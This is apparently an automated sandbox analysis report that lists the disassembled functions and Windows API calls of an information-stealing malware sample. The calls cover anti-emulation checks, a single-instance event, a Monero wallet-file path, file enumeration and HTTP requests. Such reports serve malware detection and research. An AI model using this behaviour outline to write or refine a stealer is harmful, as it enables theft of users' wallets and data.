                                    • Part of subcall function 00E41220: __aulldiv.LIBCMT ref: 00E41266
                                    • Part of subcall function 00E41220: ExitProcess.KERNEL32 ref: 00E41294
                                    • Part of subcall function 00E56770: GetUserDefaultLangID.KERNEL32 ref: 00E56774
                                    • Part of subcall function 00E41190: ExitProcess.KERNEL32 ref: 00E411C6
                                    • Part of subcall function 00E57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                    • Part of subcall function 00E57850: RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                    • Part of subcall function 00E57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                    • Part of subcall function 00E578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                    • Part of subcall function 00E578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                    • Part of subcall function 00E578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00E56AF9
                                  • Sleep.KERNEL32(00001770), ref: 00E56B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56B1A
                                  • ExitProcess.KERNEL32 ref: 00E56B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 053549517661d10ae9fe141f8f38ff61aa7293af62392b8faeb0b9dacf751397
                                  • Instruction ID: 58d1fb735de1327c0009e00060526f7708dddec3a3416fd520d0f8d2e2a48099
                                  • Opcode Fuzzy Hash: 053549517661d10ae9fe141f8f38ff61aa7293af62392b8faeb0b9dacf751397
                                  • Instruction Fuzzy Hash: B23134719042189BDB04F7F0EC56BEE77B8AF44342F446A29F942B3182DF745949C7A1
                                  Function 00E41220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 e41220-e41247 call e589b0 GlobalMemoryStatusEx 1439 e41273-e4127a 1436->1439 1440 e41249-e41271 call e5da00 * 2 1436->1440 1442 e41281-e41285 1439->1442 1440->1442 1444 e41287 1442->1444 1445 e4129a-e4129d 1442->1445 1447 e41292-e41294 ExitProcess 1444->1447 1448 e41289-e41290 1444->1448 1448->1445 1448->1447
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E4123E
                                  • __aulldiv.LIBCMT ref: 00E41258
                                  • __aulldiv.LIBCMT ref: 00E41266
                                  • ExitProcess.KERNEL32 ref: 00E41294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: 9e003c81df87e20d11ede1e58b78528376e2f56f3046681e002b333ddf50632f
                                  • Instruction ID: 9ec349e3804a3ea085c16a24923df563ba0e6792d6b9cd0cef0668f6b1037f8e
                                  • Opcode Fuzzy Hash: 9e003c81df87e20d11ede1e58b78528376e2f56f3046681e002b333ddf50632f
                                  • Instruction Fuzzy Hash: F4014FB0E44308FADF10DBD0DC49B9EB7B8AB04705F209445E705F6180D7B455859759
                                  Function 00E56AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1450 e56af3 1451 e56b0a 1450->1451 1453 e56b0c-e56b22 call e56920 call e55b10 CloseHandle ExitProcess 1451->1453 1454 e56aba-e56ad7 call e5aad0 OpenEventA 1451->1454 1459 e56af5-e56b04 CloseHandle Sleep 1454->1459 1460 e56ad9-e56af1 call e5aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E56AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00E56AF9
                                  • Sleep.KERNEL32(00001770), ref: 00E56B04
                                  • CloseHandle.KERNEL32(?,00000000,?,01CB99E0,?,00E6110C,?,00000000,?,00E61110,?,00000000,00E60AEF), ref: 00E56B1A
                                  • ExitProcess.KERNEL32 ref: 00E56B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 6dc4ccd388195efcfa364ca953cb59e802be9f51519b149e680abb2ce72f6351
                                  • Instruction ID: 5c4cd7c00104e168791e57039752d25ce143b7332dd769a63a2ede72fb5a5f13
                                  • Opcode Fuzzy Hash: 6dc4ccd388195efcfa364ca953cb59e802be9f51519b149e680abb2ce72f6351
                                  • Instruction Fuzzy Hash: 29F09A30A04209EEEB20ABA0DC0ABBD7BB4FB04302F906D15BD43B3082CBB51508D661
                                  Function 00E447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: d89b6aff81fe5bdf903f0cdff34c6d6abfa984605532296e5066fec970449f10
                                  • Instruction ID: 1c35778cf7ce90132c7fa331b1a9f14fb500170868e3ed63d810710d623c5b1a
                                  • Opcode Fuzzy Hash: d89b6aff81fe5bdf903f0cdff34c6d6abfa984605532296e5066fec970449f10
                                  • Instruction Fuzzy Hash: D9213EB1D00209ABDF14DFA5EC49ADE7B74FB44320F108625F955B7291EB706A09CB91
                                  Function 00E551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E46280: InternetOpenA.WININET(00E60DFE,00000001,00000000,00000000,00000000), ref: 00E462E1
                                    • Part of subcall function 00E46280: StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E46303
                                    • Part of subcall function 00E46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46335
                                    • Part of subcall function 00E46280: HttpOpenRequestA.WININET(00000000,GET,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E46385
                                    • Part of subcall function 00E46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E463BF
                                    • Part of subcall function 00E46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E463D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E55228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: bf724c35bb1a3fd7b6b59c265352fc7339401a1e2b234477d4e7ef1fe09c0447
                                  • Instruction ID: 453a1c1b3308a3a5b472a846854f7c37c2c6b81b267a832fb6fbc83846b0aa75
                                  • Opcode Fuzzy Hash: bf724c35bb1a3fd7b6b59c265352fc7339401a1e2b234477d4e7ef1fe09c0447
                                  • Instruction Fuzzy Hash: 9C112131910108A7CB18FF60DD56AED77B8AF50341F445A68FC1A66592EF346B09C791
                                  Function 00E41110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E4112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E41132
                                  • ExitProcess.KERNEL32 ref: 00E41143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 28a04255950d655695b9dffc3f377ba2cbf66ecbd3a74e4215ed0998b7b60e32
                                  • Instruction ID: 33b8028139e1a1e8ee7bd3493d9f18d665dda40ab5f286cda4f03706911c4c1d
                                  • Opcode Fuzzy Hash: 28a04255950d655695b9dffc3f377ba2cbf66ecbd3a74e4215ed0998b7b60e32
                                  • Instruction Fuzzy Hash: 48E0E670A59308FFEB20ABA1AC0AB0D76B8AB04B45F105095F749775C4D6B926409799
                                  Function 00E410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E410B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E410F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 5d792c1a7f1a9ea46d9e7948ff184d658276c10939ea7efe5096e3c59f0ec8db
                                  • Instruction ID: 420145111ff84e13b80cdf09ff62479cedbab47d73a79048aa75cc3f48330529
                                  • Opcode Fuzzy Hash: 5d792c1a7f1a9ea46d9e7948ff184d658276c10939ea7efe5096e3c59f0ec8db
                                  • Instruction Fuzzy Hash: 2DF0E271641208FBEB149AA4AC49FAFB7E8E705B15F301848F944F3280D5729E40DBA0
                                  Function 00E41190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                    • Part of subcall function 00E578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                    • Part of subcall function 00E578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                    • Part of subcall function 00E57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                    • Part of subcall function 00E57850: RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                    • Part of subcall function 00E57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                  • ExitProcess.KERNEL32 ref: 00E411C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: 28b8d38b96ee3ce4dcdb1dbd7b72ad1041fbfc5ece8891ac12c0e7d624b4787d
                                  • Instruction ID: 8ddbc43f21846d98dd8b98dc5475d1499045ce6c335b5ae8343ce8310ba91de2
                                  • Opcode Fuzzy Hash: 28b8d38b96ee3ce4dcdb1dbd7b72ad1041fbfc5ece8891ac12c0e7d624b4787d
                                  • Instruction Fuzzy Hash: 58E0ECB5A1821197CE1473B0BD0AB2A32DC5B1434AF042825BE85B3606FE2AE8548669

                                  Non-executed Functions

                                  Function 00E538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E538CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E538E3
                                  • lstrcat.KERNEL32(?,?), ref: 00E53935
                                  • StrCmpCA.SHLWAPI(?,00E60F70), ref: 00E53947
                                  • StrCmpCA.SHLWAPI(?,00E60F74), ref: 00E5395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E53C67
                                  • FindClose.KERNEL32(000000FF), ref: 00E53C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: b034259d3abf24bc64beee693d2abcf34be9cc9d604241de2783a8ddc367896c
                                  • Instruction ID: 15e0a4ae95f09c547ebb84faa3a6c0968830b428948d695a7523300b99b08a79
                                  • Opcode Fuzzy Hash: b034259d3abf24bc64beee693d2abcf34be9cc9d604241de2783a8ddc367896c
                                  • Instruction Fuzzy Hash: 26A141B1A00218DBDB34DF64DC85FEE73B8BB88301F044989A94DA7145EB759B88CF61
                                  Function 00E4BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
